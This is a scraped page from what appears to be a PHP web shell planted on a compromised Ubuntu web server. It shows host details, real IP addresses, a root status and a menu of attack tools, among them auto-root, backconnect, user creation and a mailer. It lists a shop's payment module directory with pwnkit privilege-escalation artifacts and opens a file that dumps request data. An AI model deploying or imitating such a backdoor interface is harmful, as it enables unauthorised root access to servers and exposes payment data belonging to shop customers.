Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
tienda /
modules /
payco /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
controllers
[ DIR ]
drwxrwxrwx
lib
[ DIR ]
drwxrwxrwx
tpl
[ DIR ]
drwxrwxrwx
translations
[ DIR ]
drwxrwxrwx
upgrade
[ DIR ]
drwxrwxrwx
views
[ DIR ]
drwxrwxrwx
.DS_Store
8
KB
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
Readme.md
7
B
-rwxrwxrwx
boton.png
5.02
KB
-rwxrwxrwx
config.xml
546
B
-rwxrwxrwx
config_cb.xml
571
B
-rwxrwxrwx
config_es.xml
478
B
-rwxrwxrwx
confirm.php
1.95
KB
-rwxrwxrwx
cron.php
2.18
KB
-rwxrwxrwx
index.php
1.3
KB
-rwxrwxrwx
logo-small.png
5.7
KB
-rwxrwxrwx
logo.gif
1.38
KB
-rwxrwxrwx
logo.png
3.34
KB
-rwxrwxrwx
payco.jpg
3.34
KB
-rwxrwxrwx
payco.php
27.29
KB
-rwxrwxrwx
payment.php
320
B
-rwxrwxrwx
preload.gif
9.03
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
retornar.php
44
B
-rwxrwxrwx
return.php
1.91
KB
-rwxrwxrwx
text.txt
0
B
-rwxrwxrwx
validation.php
2.46
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : return.php
<?php echo "hola mundo de afuera"; var_export($_REQUEST); //$useSSL = true; /*include(dirname(__FILE__).'/../../config/config.inc.php'); Tools::displayFileAsDeprecated(); include(dirname(__FILE__).'/payco.php'); //$context = Context::getContext(); include( '../../header.php' ); $payco = new Payco(); if (isset($_REQUEST['x_cod_respuesta'])) { $payco->PaymentSuccess($_REQUEST['x_extra1'],$_REQUEST['x_extra2'],$_REQUEST['x_cod_respuesta']); //Tools::redirect('index.php?controller=respuestaev1'.($_REQUEST ? '&'.http_build_query($_REQUEST, '', '&') : ''), __PS_BASE_URI__, null, 'HTTP/1.1 301 Moved Permanently'); } if (isset($_REQUEST['x_cod_respuesta'])) { global $smarty; $payco->PaymentSuccess($_REQUEST['x_extra1'],$_REQUEST['x_extra2'],$_REQUEST['x_cod_respuesta']); $medio_pago=$_POST['x_franchise']; switch($medio_pago) { case 'VS': $franquicia = "Visa";break; case 'MC': $franquicia = "MasterCard";break; case 'AM': $franquicia = "American Express";break; case 'DN': $franquicia = "Diners";break; case 'CR': $franquicia = "Credencial";break; case 'PSE': $franquicia = "PSE (Proveedor de Servicios Electrónicos)";break; //case 'DV': $franquicia = "Debito Visa";break; //case 'DM': $franquicia = "Debito MasterCard";break; } //Acentarpago($_POST['x_respuesta'],$_POST['x_id_factura']); $smarty->assign(array('respuesta'=>$_REQUEST['x_cod_respuesta'], 'ref_venta'=>$_REQUEST['x_id_factura'], 'valor'=>$_REQUEST['x_amount'], 'moneda'=>$_REQUEST['x_currency_code'], 'fecha'=>$_REQUEST['fecha_transaccion'], 'numero_transaccion'=>$_REQUEST['x_transaction_id'], 'codaprovacion'=>$_REQUEST['x_aproval_code'], 'refpayco'=>$_REQUEST['x_ref_payco'], 'franquicia'=>$franquicia, 'mensaje'=>$_REQUEST['x_response_reason_text'])); $smarty->display( dirname(__FILE__) . '/tpl/respuesta.tpl' ); } include( '../../footer.php' );*/ ?>
Close